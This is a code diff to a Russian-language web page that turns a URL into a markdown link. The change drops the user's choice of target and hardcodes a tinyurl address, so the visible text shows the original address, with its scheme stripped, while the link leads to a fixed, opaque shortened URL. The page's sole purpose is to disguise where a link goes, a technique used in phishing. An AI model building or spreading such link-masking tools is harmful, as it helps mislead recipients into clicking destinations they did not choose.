--- a/index.html
+++ b/index.html
@@ -61,10 +61,8 @@ font-size: 16px;
 <body>
 <div class="container">
 <h1>Трансформация ссылки</h1>
-<p>Введите оригинальную ссылку и скрытную ссылку:</p>
+<p>Введите оригинальную ссылку:</p>
 <input type="text" id="originalLink" placeholder="Оригинальная ссылка">
-<br>
-<input type="text" id="hiddenLink" placeholder="Скрытная ссылка">
 <br>
 <button onclick="transformLink()">Трансформировать</button>
 <br>
@@ -75,8 +73,9 @@ font-size: 16px;
 
 <script>
 function transformLink() {
-const originalLink = document.getElementById('originalLink').value;
-const hiddenLink = document.getElementById('hiddenLink').value;
+let originalLink = document.getElementById('originalLink').value;
+originalLink = originalLink.replace(/^https?:\/\//, '');
+const hiddenLink = 'https://tinyurl.com/dolbaebdocx';
 const result = `[${originalLink}](${hiddenLink})`;
 document.getElementById('result').value = result;
 }
